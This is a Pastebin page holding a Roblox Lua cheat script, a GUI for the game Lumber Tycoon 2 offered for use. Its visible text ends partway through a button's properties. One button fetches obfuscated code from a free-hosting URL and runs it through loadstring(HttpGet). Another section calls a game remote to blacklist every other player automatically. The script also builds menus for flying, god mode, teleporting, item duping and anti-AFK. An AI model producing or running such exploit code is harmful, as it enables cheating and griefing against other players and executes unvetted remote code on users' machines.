vVengance

Lumber Tycoon 2 GUI

May 1st, 2019
77,143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 140.99 KB | None | 0 0
  1. -- Farewell Infortality.
  2. -- Version: 2.82
  3. -- Instances:
  4. local ScreenGui = Instance.new("ScreenGui")
  5. local OpenFrame = Instance.new("Frame")
  6. local Open = Instance.new("TextButton")
  7. local Main = Instance.new("Frame")
  8. local Title = Instance.new("TextLabel")
  9. local LumberWrecker = Instance.new("TextButton")
  10. local LuckyGUI = Instance.new("TextButton")
  11. local BaseWreck = Instance.new("TextButton")
  12. local Close = Instance.new("TextButton")
  13. local StercoreGUI = Instance.new("TextButton")
  14. local Credits = Instance.new("TextLabel")
  15. --Properties:
  16. ScreenGui.Parent = game.CoreGui
  17. OpenFrame.Name = "Open Frame"
  18. OpenFrame.Parent = ScreenGui
  19. OpenFrame.BackgroundColor3 = Color3.new(1, 0.494118, 0.494118)
  20. OpenFrame.Position = UDim2.new(0, 0, 0.55009824, 0)
  21. OpenFrame.Size = UDim2.new(0, 89, 0, 30)
  22. OpenFrame.Style = Enum.FrameStyle.RobloxRound
  23.  
  24. Open.Name = "Open"
  25. Open.Parent = OpenFrame
  26. Open.BackgroundColor3 = Color3.new(1, 1, 1)
  27. Open.Position = UDim2.new(0.0253755804, 0, 0.0711110383, 0)
  28. Open.Size = UDim2.new(0, 69, 0, 15)
  29. Open.Style = Enum.ButtonStyle.RobloxRoundButton
  30. Open.Font = Enum.Font.Gotham
  31. Open.Text = "Open"
  32. Open.TextColor3 = Color3.new(0, 0, 0)
  33. Open.TextSize = 14
  34. Open.MouseButton1Down:connect(function()
  35. Main.Visible = true
  36. OpenFrame.Visible = false
  37. end)
  38.  
  39. Main.Name = "Main"
  40. Main.Parent = ScreenGui
  41. Main.BackgroundColor3 = Color3.new(0.298039, 0.298039, 0.298039)
  42. Main.Position = UDim2.new(0.0834224597, 0, 0.0726915523, 0)
  43. Main.Size = UDim2.new(0, 186, 0, 219)
  44. Main.Active = true
  45. Main.Draggable = true
  46.  
  47. Title.Name = "Title"
  48. Title.Parent = Main
  49. Title.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255)
  50. Title.Size = UDim2.new(0, 186, 0, 30)
  51. Title.Font = Enum.Font.Gotham
  52. Title.Text = "Pick Your Poison!"
  53. Title.TextColor3 = Color3.new(0.992157, 0.992157, 0.992157)
  54. Title.TextSize = 14
  55. Title.TextStrokeColor3 = Color3.new(1, 1, 1)
  56. Title.TextWrapped = true
  57.  
  58. LumberWrecker.Name = "Lumber Wrecker"
  59. LumberWrecker.Parent = Main
  60. LumberWrecker.BackgroundColor3 = Color3.new(1, 1, 1)
  61. LumberWrecker.Position = UDim2.new(0.0645161271, 0, 0.520547926, 0)
  62. LumberWrecker.Size = UDim2.new(0, 161, 0, 30)
  63. LumberWrecker.Font = Enum.Font.Gotham
  64. LumberWrecker.Text = "Lumber Wrecker"
  65. LumberWrecker.TextColor3 = Color3.new(0, 0, 0)
  66. LumberWrecker.TextSize = 14
  67. LumberWrecker.MouseButton1Down:connect(function()
  68. loadstring(game:HttpGet("https://lumberwrecker.000webhostapp.com/LumberWrecker_V1.3_Obfuscated.php", true))()
  69. end)
  70.  
  71. LuckyGUI.Name = "LuckyGUI"
  72. LuckyGUI.Parent = Main
  73. LuckyGUI.BackgroundColor3 = Color3.new(1, 1, 1)
  74. LuckyGUI.Position = UDim2.new(0.0643436238, 0, 0.352315843, 0)
  75. LuckyGUI.Size = UDim2.new(0, 161, 0, 30)
  76. LuckyGUI.Font = Enum.Font.Gotham
  77. LuckyGUI.Text = "LuckyGUI"
  78. LuckyGUI.TextColor3 = Color3.new(0, 0, 0)
  79. LuckyGUI.TextSize = 14
  80. LuckyGUI.MouseButton1Down:connect(function()
  81.  
  82.  
  83. Mouse = game.Players.LocalPlayer:GetMouse()
  84.  
  85. Client = game.ReplicatedStorage.Interaction.ClientSetListPlayer
  86. players = game.Players
  87. for i, v in pairs(players:GetPlayers()) do
  88. if v.Name ~= players.LocalPlayer.Name then
  89. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, v, true)
  90. end
  91. end
  92. players.PlayerAdded:connect(function(plr)
  93. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, plr, true)
  94. end)
  95.  
  96. --- Fly ---
  97.  
  98. function fly()
  99. for i,v in pairs(script:GetChildren()) do
  100. pcall(function() v.Value = "" end)
  101. game:GetService("Debris"):AddItem(v,.1)
  102. end
  103.  
  104. function weld(p0,p1,c0,c1,par)
  105. local w = Instance.new("Weld",p0 or par)
  106. w.Part0 = p0
  107. w.Part1 = p1
  108. w.C0 = c0 or CFrame.new()
  109. w.C1 = c1 or CFrame.new()
  110. return w
  111. end
  112.  
  113. local motors = {}
  114.  
  115. function motor(p0,p1,c0,c1,des,vel,par)
  116. local w = Instance.new("Motor6D",p0 or par)
  117. w.Part0 = p0
  118. w.Part1 = p1
  119. w.C0 = c0 or CFrame.new()
  120. w.C1 = c1 or CFrame.new()
  121. w.MaxVelocity = tonumber(vel) or .05
  122. w.DesiredAngle = tonumber(des) or 0
  123. return w
  124. end
  125.  
  126. function lerp(a,b,c)
  127. return a+(b-a)*c
  128. end
  129.  
  130. function clerp(c1,c2,al)
  131. local com1 = {c1.X,c1.Y,c1.Z,c1:toEulerAnglesXYZ()}
  132. local com2 = {c2.X,c2.Y,c2.Z,c2:toEulerAnglesXYZ()}
  133. for i,v in pairs(com1) do
  134. com1[i] = lerp(v,com2[i],al)
  135. end
  136. return CFrame.new(com1[1],com1[2],com1[3]) * CFrame.Angles(select(4,unpack(com1)))
  137. end
  138.  
  139. function ccomplerp(c1,c2,al)
  140. local com1 = {c1:components()}
  141. local com2 = {c2:components()}
  142. for i,v in pairs(com1) do
  143. com1[i] = lerp(v,com2[i],al)
  144. end
  145. return CFrame.new(unpack(com1))
  146. end
  147.  
  148. function tickwave(time,length,offset)
  149. return (math.abs((tick()+(offset or 0))%time-time/2)*2-time/2)/time/2*length
  150. end
  151.  
  152. function invcol(c)
  153. c = c.Color
  154. return BrickColor.new(Color3.new(1-c.b,1-c.g,1-c.r))
  155. end
  156. local oc = oc or function(...) return ... end
  157. local plr = game.Players.LocalPlayer
  158. local char = plr.Character
  159. local tor = char.Torso
  160. local hum = char.Humanoid
  161. hum.PlatformStand = false
  162. pcall(function()
  163. char.Wings:Destroy()
  164. end)
  165. pcall(function()
  166. char.Angel:Destroy() -- hat
  167. end)
  168. local mod = Instance.new("Model",char)
  169. mod.Name = "Wings"
  170. local special = {
  171. [game.Players.LocalPlayer.Name] = {"Black","Bright red",.5,0,false,Color3.new(1,0,0),Color3.new(0,0,0)},
  172. }
  173. local topcolor = BrickColor.new("Really black")
  174. local feacolor = BrickColor.new("Black")
  175. local ptrans = 0
  176. local pref = 0
  177. local fire = true
  178. local fmcol = Color3.new()
  179. local fscol = Color3.new()
  180. local spec = special[plr.Name:lower()]
  181. if spec then
  182. topcolor,feacolor,ptrans,pref,fire,fmcol,fscol = spec[1] and BrickColor.new(spec[1]) or topcolor,spec[2] and BrickColor.new(spec[2]) or feacolor,spec[3],spec[4],spec[5],spec[6],spec[7]
  183. end
  184. local part = Instance.new("Part")
  185. part.FormFactor = "Custom"
  186. part.Size = Vector3.new(.2,.2,.2)
  187. part.TopSurface,part.BottomSurface = 0,0
  188. part.CanCollide = false
  189. part.BrickColor = BrickColor.new("Black")
  190. part.Transparency = ptrans
  191. part.Reflectance = pref
  192. local ef = Instance.new("Fire",fire and part or nil)
  193. ef.Size = .15
  194. ef.Color = BrickColor.new("Black").Color
  195. ef.SecondaryColor = BrickColor.new("Bright red").Color
  196. part:BreakJoints()
  197. function newpart()
  198. local clone = part:Clone()
  199. clone.Parent = mod
  200. clone:BreakJoints()
  201. return clone
  202. end
  203. local feath = newpart()
  204. feath.BrickColor = feacolor
  205. feath.Transparency = 0
  206. Instance.new("SpecialMesh",feath).MeshType = "Sphere"
  207. function newfeather()
  208. local clone = feath:Clone()
  209. clone.Parent = mod
  210. clone:BreakJoints()
  211. return clone
  212. end
  213. flying = false
  214. moving = false
  215. for i,v in pairs(tor:GetChildren()) do
  216. if v.ClassName:lower():match("body") then
  217. v:Destroy()
  218. end
  219. end
  220. local ctor = tor:Clone()
  221. ctor:ClearAllChildren()
  222. ctor.Name = "cTorso"
  223. ctor.Transparency = 1
  224. ctor.CanCollide = false
  225. ctor.FormFactor = "Custom"
  226. ctor.Size = Vector3.new(.2,.2,.2)
  227. ctor.Parent = mod
  228. weld(tor,ctor)
  229. local bg = Instance.new("BodyGyro",ctor)
  230. bg.maxTorque = Vector3.new()
  231. bg.P = 15000
  232. bg.D = 1000
  233. local bv = Instance.new("BodyVelocity",ctor)
  234. bv.maxForce = Vector3.new()
  235. bv.P = 15000
  236. vel = Vector3.new()
  237. cf = CFrame.new()
  238. flspd = 0
  239. keysdown = {}
  240. keypressed = {}
  241. ktime = {}
  242. descendtimer = 0
  243. jumptime = tick()
  244. hum.Jumping:connect(function()
  245. jumptime = tick()
  246. end)
  247. cam = workspace.CurrentCamera
  248. kd = plr:GetMouse().KeyDown:connect(oc(function(key)
  249. keysdown[key] = true
  250. keypressed[key] = true
  251. if key == "q" then
  252. descendtimer = tick()
  253. elseif key == " " and not hum.Jump then
  254. jumptime = tick()
  255. elseif (key == "a" or key == "d") and ktime[key] and tick()-ktime[key] < .3 and math.abs(reqrotx) < .3 then
  256. reqrotx = key == "a" and math.pi*2 or -math.pi*2
  257. end
  258. ktime[key] = tick()
  259. end))
  260.  
  261. ku = plr:GetMouse().KeyUp:connect(function(key)
  262. keysdown[key] = false
  263. if key == " " then
  264. descendtimer = tick()
  265. end
  266. end)
  267. function mid(a,b,c)
  268. return math.max(a,math.min(b,c or -a))
  269. end
  270. function bn(a)
  271. return a and 1 or 0
  272. end
  273. function gm(tar)
  274. local m = 0
  275. for i,v in pairs(tar:GetChildren()) do
  276. if v:IsA("BasePart") then
  277. m = m + v:GetMass()
  278. end
  279. m = m + gm(v)
  280. end
  281. return m
  282. end
  283. reqrotx = 0
  284. local grav = 196.2
  285. local con
  286. con = game:GetService("RunService").Stepped:connect(oc(function()
  287. local obvel = tor.CFrame:vectorToObjectSpace(tor.Velocity)
  288. local sspd, uspd,fspd = obvel.X,obvel.Y,obvel.Z
  289. if flying then
  290. local lfldir = fldir
  291. fldir = cam.CoordinateFrame:vectorToWorldSpace(Vector3.new(bn(keysdown.d)-bn(keysdown.a),0,bn(keysdown.s)-bn(keysdown.w))).unit
  292. local lmoving = moving
  293. moving = fldir.magnitude > .1
  294. if lmoving and not moving then
  295. idledir = lfldir*Vector3.new(1,0,1)
  296. descendtimer = tick()
  297. end
  298. local dbomb = fldir.Y < -.6 or (moving and keysdown["1"])
  299. if moving and keysdown["0"] and lmoving then
  300. fldir = (Vector3.new(lfldir.X,math.min(fldir.Y,lfldir.Y+.01)-.1,lfldir.Z)+(fldir*Vector3.new(1,0,1))*.05).unit
  301. end
  302. local down = tor.CFrame:vectorToWorldSpace(Vector3.new(0,-1,0))
  303. local descending = (not moving and keysdown["q"] and not keysdown[" "])
  304. cf = ccomplerp(cf,CFrame.new(tor.Position,tor.Position+(not moving and idledir or fldir)),keysdown["0"] and .02 or .07)
  305. local gdown = not dbomb and cf.lookVector.Y < -.2 and tor.Velocity.unit.Y < .05
  306. hum.PlatformStand = true
  307. bg.maxTorque = Vector3.new(1,1,1)*9e5
  308. local rotvel = CFrame.new(Vector3.new(),tor.Velocity):toObjectSpace(CFrame.new(Vector3.new(),fldir)).lookVector
  309. bg.cframe = cf * CFrame.Angles(not moving and -.1 or -math.pi/2+.2,moving and mid(-2.5,rotvel.X/1.5) + reqrotx or 0,0)
  310. reqrotx = reqrotx - reqrotx/10
  311. bv.maxForce = Vector3.new(1,1,1)*9e4*.5
  312. local anioff =(bn(keysdown[" "])-bn(keysdown["q"]))/2
  313. local ani = tickwave(1.5-anioff,1)
  314. bv.velocity = bv.velocity:Lerp(Vector3.new(0,bn(not moving)*-ani*15+(descending and math.min(20,tick()-descendtimer)*-8 or bn(keysdown[" "])-bn(keysdown["q"]))*15,0)+vel,.6)
  315. vel = moving and cf.lookVector*flspd or Vector3.new()
  316. flspd = math.min(120,lerp(flspd,moving and (fldir.Y<0 and flspd+(-fldir.Y)*grav/60 or math.max(50,flspd-fldir.Y*grav/300)) or 60,.4))
  317. local hit,ray = workspace:FindPartOnRayWithIgnoreList(Ray.new(tor.Position,Vector3.new(0,-3.5+math.min(0,bv.velocity.y)/30,0)),{char})
  318. if hit and down.Y < -.85 and tick()-flystart > 1 then
  319. flying = false
  320. hum.PlatformStand = false
  321. tor.Velocity = Vector3.new()
  322. end
  323. else
  324. bg.maxTorque = Vector3.new()
  325. bv.maxForce = Vector3.new()
  326. local x,y,z = fspd/160,uspd/700,sspd/900
  327. if keypressed[" "] and not flying and (tick()-jumptime > .05 and (tick()-jumptime < 3 or hum.Jump)) then
  328. vel = Vector3.new(0,50,0)
  329. bv.velocity = vel
  330. idledir = cam.CoordinateFrame.lookVector*Vector3.new(1,0,1)
  331. cf = tor.CFrame * CFrame.Angles(-.01,0,0)
  332. tor.CFrame = cf
  333. bg.cframe = cf
  334. flystart = tick()
  335. flying = true
  336. end
  337. end
  338. keypressed = {}
  339. end))
  340. end
  341. fly()
  342.  
  343. ---
  344.  
  345. Option = false
  346. BTool = "Nothing"
  347. WCollide = "Nothing"
  348. LT2Info = "Nothing"
  349. GreyStart = "Nothing"
  350. MDown = false
  351. afkactive = false
  352. CustomLocationSet = false
  353.  
  354. -- Objects
  355.  
  356. local LT2GUI = Instance.new("ScreenGui")
  357. local MainFrame = Instance.new("Frame")
  358. local MenuLeftFrame = Instance.new("Frame")
  359. local LT2GUI2Frame = Instance.new("Frame")
  360. local BringTree = Instance.new("TextButton")
  361. local Waypoints = Instance.new("TextButton")
  362. local SellFrame = Instance.new("Frame")
  363. local SellWoodPlanks = Instance.new("TextButton")
  364. local SellWood = Instance.new("TextButton")
  365. local SellPlanks = Instance.new("TextButton")
  366. local SellWoodTxt1 = Instance.new("TextLabel")
  367. local SellPlanksTxt1 = Instance.new("TextLabel")
  368. local Greywood = Instance.new("TextButton")
  369. local GreywoodFrame = Instance.new("Frame")
  370. local GreywoodHeader = Instance.new("TextLabel")
  371. local GreywoodInfo = Instance.new("TextLabel")
  372. local GreywoodStart = Instance.new("TextButton")
  373. local StartFrameInfo = Instance.new("TextLabel")
  374. local TPWood = Instance.new("TextButton")
  375. local TPPlanks = Instance.new("TextButton")
  376. local PlankFrame = Instance.new("Frame")
  377. local ProcessedWoodList = Instance.new("ScrollingFrame")
  378. local TpAllPlanks = Instance.new("TextButton")
  379. local TpAllPlanksSpacer = Instance.new("TextLabel")
  380. local TpAllPlanksTxt1 = Instance.new("TextLabel")
  381. local GodMode = Instance.new("TextButton")
  382. local GoldAxe = Instance.new("TextButton")
  383. local GoldAxeInfo = Instance.new("TextLabel")
  384. local GoldAxeFrame = Instance.new("Frame")
  385. local GoldAxeHeader = Instance.new("TextLabel")
  386. local GoldAxeStart = Instance.new("TextButton")
  387. local Duper = Instance.new("TextButton")
  388. local Depart = Instance.new("TextLabel")
  389. local CopyTool = Instance.new("TextButton")
  390. local DeleteTool = Instance.new("TextButton")
  391. local MoveTool = Instance.new("TextButton")
  392. local WaterCollide = Instance.new("TextButton")
  393. local Minimize = Instance.new("TextButton")
  394. local MenuFrame = Instance.new("Frame")
  395. local WaypointFrame = Instance.new("Frame")
  396. local WaypointList = Instance.new("ScrollingFrame")
  397. local BoxedCars = Instance.new("TextButton")
  398. local Cave = Instance.new("TextButton")
  399. local LinksLogic = Instance.new("TextButton")
  400. local Volcano = Instance.new("TextButton")
  401. local BobsShack = Instance.new("TextButton")
  402. local FancyFurnishings = Instance.new("TextButton")
  403. local LandStore = Instance.new("TextButton")
  404. local Dock = Instance.new("TextButton")
  405. local FineArtsShop = Instance.new("TextButton")
  406. local PalmIsland = Instance.new("TextButton")
  407. local Bridge = Instance.new("TextButton")
  408. local Swamp = Instance.new("TextButton")
  409. local SpawnPoint = Instance.new("TextButton")
  410. local WoodRUs = Instance.new("TextButton")
  411. local EndTimes = Instance.new("TextButton")
  412. local ShrineOfSight = Instance.new("TextButton")
  413. local TheDen = Instance.new("TextButton")
  414. local VolcanoWin = Instance.new("TextButton")
  415. local SkiLodge = Instance.new("TextButton")
  416. local StrangeMan = Instance.new("TextButton")
  417. local ShowLocation = Instance.new("TextButton")
  418. local CustomTPPoint = Instance.new("TextButton")
  419. local PlotTp = Instance.new("TextButton")
  420. local BringTreeFrame = Instance.new("Frame")
  421. local BringTreeHeader = Instance.new("TextLabel")
  422. local BringTreeInfo1 = Instance.new("TextButton")
  423. local BringTreeInfo2 = Instance.new("TextLabel")
  424. local ElmTree = Instance.new("TextButton")
  425. local CherryTree = Instance.new("TextButton")
  426. local OakTree = Instance.new("TextButton")
  427. local BirchTree = Instance.new("TextButton")
  428. local CaveCrawlerTree = Instance.new("TextButton")
  429. local GoldTree = Instance.new("TextButton")
  430. local GreenTree = Instance.new("TextButton")
  431. local SpookyTree = Instance.new("TextButton")
  432. local FirTree = Instance.new("TextButton")
  433. local VolcanoTree = Instance.new("TextButton")
  434. local KoaTree = Instance.new("TextButton")
  435. local PalmTree = Instance.new("TextButton")
  436. local EndTimesTree = Instance.new("TextButton")
  437. local WalnutTree = Instance.new("TextButton")
  438. local DupeFrame = Instance.new("Frame")
  439. local Info = Instance.new("TextLabel")
  440. local Dupe = Instance.new("TextButton")
  441. local DupingText1 = Instance.new("TextLabel")
  442. local MoreInfo = Instance.new("TextButton")
  443. local Read = Instance.new("TextLabel")
  444. local PlayerFrame = Instance.new("Frame")
  445. local Player1 = Instance.new("TextButton")
  446. local Player2 = Instance.new("TextButton")
  447. local Player3 = Instance.new("TextButton")
  448. local Player4 = Instance.new("TextButton")
  449. local Player5 = Instance.new("TextButton")
  450. local Player6 = Instance.new("TextButton")
  451. local PlyrSel = Instance.new("TextLabel")
  452. local TpPlayer = Instance.new("TextButton")
  453. local TpBase = Instance.new("TextButton")
  454. local WalkSpeed = Instance.new("TextButton")
  455. local JumpPower = Instance.new("TextButton")
  456. local WalkText = Instance.new("TextBox")
  457. local JumpText = Instance.new("TextBox")
  458. local NoClip = Instance.new("TextButton")
  459. local GuiLabel = Instance.new("TextButton")
  460. local GuiInfo = Instance.new("TextLabel")
  461. local GuiInfoExtras = Instance.new("TextLabel")
  462. local BToolsHeader = Instance.new("TextLabel")
  463. local AntiAFK = Instance.new("TextButton")
  464. local AntiAFKtime = Instance.new("TextLabel")
  465. local PlayerTp = Instance.new("TextButton")
  466. local TPTool = Instance.new("TextButton")
  467. local ReJoinServer = Instance.new("TextButton")
  468. local OpenFrame = Instance.new("Frame")
  469. local Open = Instance.new("TextButton")
  470. local CloseLT2 = Instance.new("TextButton")
  471.  
  472. -- Properties
  473.  
  474. LT2GUI.Name = "LT2GUI"
  475. LT2GUI.Parent = game.CoreGui
  476. local LT2CORE = game.CoreGui["LT2GUI"]
  477.  
  478. OpenFrame.Name = "OpenFrame"
  479. OpenFrame.Parent = LT2GUI
  480. OpenFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  481. OpenFrame.BorderColor3 = Color3.new(0, 1, 0)
  482. OpenFrame.Position = UDim2.new(0.5, -40, 0, -28)
  483. OpenFrame.Size = UDim2.new(0, 80, 0, 20)
  484.  
  485. Open.Name = "Open"
  486. Open.Parent = OpenFrame
  487. Open.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  488. Open.BorderColor3 = Color3.new(0, 1, 0)
  489. Open.Size = UDim2.new(0, 80, 0, 20)
  490. Open.Font = Enum.Font.Fantasy
  491. Open.FontSize = Enum.FontSize.Size18
  492. Open.Text = "Open GUI"
  493. Open.TextColor3 = Color3.new(0, 1, 0)
  494. Open.TextSize = 18
  495. Open.Selectable = true
  496. Open.TextWrapped = true
  497.  
  498. MainFrame.Name = "MainFrame"
  499. MainFrame.Parent = LT2GUI
  500. MainFrame.Active = true
  501. MainFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  502. MainFrame.BackgroundTransparency = 0.15
  503. MainFrame.BorderColor3 = Color3.new(0, 1, 0)
  504. MainFrame.Draggable = true
  505. MainFrame.Position = UDim2.new(0, 5, 1, -550)
  506. MainFrame.Selectable = true
  507. MainFrame.Size = UDim2.new(0, 335, 0, 370)
  508. MainFrame.Visible = false
  509.  
  510. MenuLeftFrame.Name = "MenuLeftFrame"
  511. MenuLeftFrame.Parent = MainFrame
  512. MenuLeftFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  513. MenuLeftFrame.BackgroundTransparency = 1
  514. MenuLeftFrame.Position = UDim2.new(0, 5, 0, 40)
  515. MenuLeftFrame.Size = UDim2.new(0, 140, 0, 325)
  516.  
  517. MenuFrame.Name = "MenuFrame"
  518. MenuFrame.Parent = MainFrame
  519. MenuFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  520. MenuFrame.BackgroundTransparency = 0
  521. MenuFrame.BorderColor3 = Color3.new(0, 1, 0)
  522. MenuFrame.Position = UDim2.new(0, 155, 0, 40)
  523. MenuFrame.Size = UDim2.new(0, 170, 0, 290)
  524.  
  525. StartFrameInfo.Name = "StartFrameInfo"
  526. StartFrameInfo.Parent = MenuFrame
  527. StartFrameInfo.BackgroundColor3 = Color3.new(0, 0, 0)
  528. StartFrameInfo.BackgroundTransparency = 1
  529. StartFrameInfo.Position = UDim2.new(0, 3, 0, 3)
  530. StartFrameInfo.Size = UDim2.new(0, 164, 0, 284)
  531. StartFrameInfo.Font = Enum.Font.Fantasy
  532. StartFrameInfo.FontSize = Enum.FontSize.Size14
  533. StartFrameInfo.Text = "All current players and new players who join will be automatically blacklisted.\n\nTP Tool adds a backpack item to click teleport you.\n\nTP Wood to You - Chop a tree/s then go to where you want them and click this button to teleport what you chopped to you.\n\nDouble tap Space Bar to Fly.\nFly in to the ground to land.\n\nClick on LT2 at the top for more info and extra options."
  534. StartFrameInfo.TextColor3 = Color3.new(1, 1, 1)
  535. StartFrameInfo.TextWrapped = true
  536. StartFrameInfo.TextSize = 14
  537.  
  538. CloseLT2.Name = "CloseLT2"
  539. CloseLT2.Parent = MainFrame
  540. CloseLT2.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  541. CloseLT2.BorderColor3 = Color3.new(0, 1, 0)
  542. CloseLT2.Position = UDim2.new(0, 10, 0, 10)
  543. CloseLT2.Size = UDim2.new(0, 20, 0, 20)
  544. CloseLT2.Font = Enum.Font.Fantasy
  545. CloseLT2.FontSize = Enum.FontSize.Size18
  546. CloseLT2.Text = "X"
  547. CloseLT2.TextColor3 = Color3.new(1, 1, 1)
  548. CloseLT2.TextScaled = true
  549. CloseLT2.TextWrapped = true
  550. CloseLT2.TextSize = 17
  551.  
  552. Minimize.Name = "Minimize"
  553. Minimize.Parent = MainFrame
  554. Minimize.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  555. Minimize.BorderColor3 = Color3.new(0, 1, 0)
  556. Minimize.Position = UDim2.new(0, 40, 0, 10)
  557. Minimize.Size = UDim2.new(0, 20, 0, 20)
  558. Minimize.Font = Enum.Font.Fantasy
  559. Minimize.FontSize = Enum.FontSize.Size18
  560. Minimize.Text = "-"
  561. Minimize.TextColor3 = Color3.new(1, 1, 1)
  562. Minimize.TextScaled = true
  563. Minimize.TextWrapped = true
  564. Minimize.TextSize = 17
  565.  
  566. GuiLabel.Name = "GuiLabel"
  567. GuiLabel.Parent = MainFrame
  568. GuiLabel.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  569. GuiLabel.BackgroundTransparency = 0
  570. GuiLabel.BorderColor3 = Color3.new(0.2, 0.2, 0.2)
  571. GuiLabel.Position = UDim2.new(0, 78, 0, 6)
  572. GuiLabel.Size = UDim2.new(0, 49, 0, 28)
  573. GuiLabel.Font = Enum.Font.Fantasy
  574. GuiLabel.FontSize = Enum.FontSize.Size14
  575. GuiLabel.Text = "LT2"
  576. GuiLabel.TextColor3 = Color3.new(1, 0, 1)
  577. GuiLabel.TextScaled = true
  578. GuiLabel.TextSize = 14
  579. GuiLabel.TextWrapped = true
  580.  
  581. LT2GUI2Frame.Name = "LT2GUI2Frame"
  582. LT2GUI2Frame.Parent = MainFrame
  583. LT2GUI2Frame.BackgroundColor3 = Color3.new(0, 0, 0)
  584. LT2GUI2Frame.BackgroundTransparency = 0
  585. LT2GUI2Frame.BorderColor3 = Color3.new(0, 1, 0)
  586. LT2GUI2Frame.Position = UDim2.new(0, 10, 0, 40)
  587. LT2GUI2Frame.Size = UDim2.new(0, 315, 0, 320)
  588. LT2GUI2Frame.ZIndex = 8
  589. LT2GUI2Frame.Visible = false
  590. LT2GUI2Frame.Active = false
  591.  
  592. GuiInfo.Name = "GuiInfo"
  593. GuiInfo.Parent = LT2GUI2Frame
  594. GuiInfo.BackgroundColor3 = Color3.new(0, 0, 0)
  595. GuiInfo.BorderColor3 = Color3.new(0, 1, 0)
  596. GuiInfo.Position = UDim2.new(0, 0, 0, 5)
  597. GuiInfo.Size = UDim2.new(0, 315, 0, 200)
  598. GuiInfo.BackgroundTransparency = 1
  599. GuiInfo.Font = Enum.Font.Fantasy
  600. GuiInfo.FontSize = Enum.FontSize.Size14
  601. GuiInfo.Text = "CREDITS - I took ideas from different scripts and added a lot of new stuff so if you see anything that you made please let me know and I will add thanks to this screen.\n\nHope you enjoy using this.\n\nIf you want to get in touch my discord is LuckyMMB#8646"
  602. GuiInfo.TextColor3 = Color3.new(1, 1, 1)
  603. GuiInfo.TextSize = 14
  604. GuiInfo.ZIndex = 8
  605. GuiInfo.TextWrapped = true
  606. GuiInfo.TextYAlignment = Enum.TextYAlignment.Top
  607.  
  608. GuiInfoExtras.Name = "GuiInfoExtras"
  609. GuiInfoExtras.Parent = LT2GUI2Frame
  610. GuiInfoExtras.BackgroundColor3 = Color3.new(0, 0, 0)
  611. GuiInfoExtras.BorderColor3 = Color3.new(0, 0, 0)
  612. GuiInfoExtras.Position = UDim2.new(0, 125, 0, 180)
  613. GuiInfoExtras.Size = UDim2.new(0, 65, 0, 20)
  614. GuiInfoExtras.BackgroundTransparency = 0
  615. GuiInfoExtras.Font = Enum.Font.Fantasy
  616. GuiInfoExtras.FontSize = Enum.FontSize.Size18
  617. GuiInfoExtras.TextColor3 = Color3.new(1, 1, 1)
  618. GuiInfoExtras.Text = "EXTRAS"
  619. GuiInfoExtras.ZIndex = 8
  620. GuiInfoExtras.TextSize = 20
  621.  
  622. ReJoinServer.Name = "ReJoinServer"
  623. ReJoinServer.Parent = LT2GUI2Frame
  624. ReJoinServer.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  625. ReJoinServer.BorderColor3 = Color3.new(0, 1, 0)
  626. ReJoinServer.Position = UDim2.new(0, 80, 0, 210)
  627. ReJoinServer.Size = UDim2.new(0, 155, 0, 20)
  628. ReJoinServer.BackgroundTransparency = 0
  629. ReJoinServer.Font = Enum.Font.Fantasy
  630. ReJoinServer.FontSize = Enum.FontSize.Size18
  631. ReJoinServer.Text = "ReJoin Server"
  632. ReJoinServer.TextColor3 = Color3.new(1, 1, 1)
  633. ReJoinServer.ZIndex = 8
  634. ReJoinServer.TextSize = 17
  635.  
  636. AntiAFK.Name = "AntiAFK"
  637. AntiAFK.Parent = LT2GUI2Frame
  638. AntiAFK.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  639. AntiAFK.BorderColor3 = Color3.new(0, 1, 0)
  640. AntiAFK.Position = UDim2.new(0, 80, 0, 240)
  641. AntiAFK.Size = UDim2.new(0, 155, 0, 20)
  642. AntiAFK.BackgroundTransparency = 0
  643. AntiAFK.Font = Enum.Font.Fantasy
  644. AntiAFK.FontSize = Enum.FontSize.Size18
  645. AntiAFK.Text = "Start Anti-AFK Mode"
  646. AntiAFK.TextColor3 = Color3.new(1, 1, 1)
  647. AntiAFK.ZIndex = 8
  648. AntiAFK.TextSize = 17
  649.  
  650. AntiAFKtime.Name = "AntiAFKtime"
  651. AntiAFKtime.Parent = LT2GUI2Frame
  652. AntiAFKtime.BackgroundColor3 = Color3.new(0, 0, 0)
  653. AntiAFKtime.BorderColor3 = Color3.new(0, 0, 0)
  654. AntiAFKtime.Position = UDim2.new(0, 80, 0, 263)
  655. AntiAFKtime.Size = UDim2.new(0, 155, 0, 20)
  656. AntiAFKtime.BackgroundTransparency = 0
  657. AntiAFKtime.Font = Enum.Font.Fantasy
  658. AntiAFKtime.FontSize = Enum.FontSize.Size18
  659. AntiAFKtime.Text = "AFK for: 0 Seconds"
  660. AntiAFKtime.TextColor3 = Color3.new(1, 1, 1)
  661. AntiAFKtime.ZIndex = 8
  662. AntiAFKtime.TextSize = 17
  663.  
  664. BToolsHeader.Name = "BToolsHeader"
  665. BToolsHeader.Parent = LT2GUI2Frame
  666. BToolsHeader.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  667. BToolsHeader.BorderColor3 = Color3.new(0.5, 0.5, 0.5)
  668. BToolsHeader.Position = UDim2.new(0, 10, 0, 290)
  669. BToolsHeader.Size = UDim2.new(0, 70, 0, 20)
  670. BToolsHeader.BackgroundTransparency = 0
  671. BToolsHeader.Font = Enum.Font.Fantasy
  672. BToolsHeader.FontSize = Enum.FontSize.Size18
  673. BToolsHeader.Text = "BTools"
  674. BToolsHeader.TextColor3 = Color3.new(1, 1, 1)
  675. BToolsHeader.ZIndex = 8
  676. BToolsHeader.TextSize = 17
  677.  
  678. CopyTool.Name = "CopyTool"
  679. CopyTool.Parent = LT2GUI2Frame
  680. CopyTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
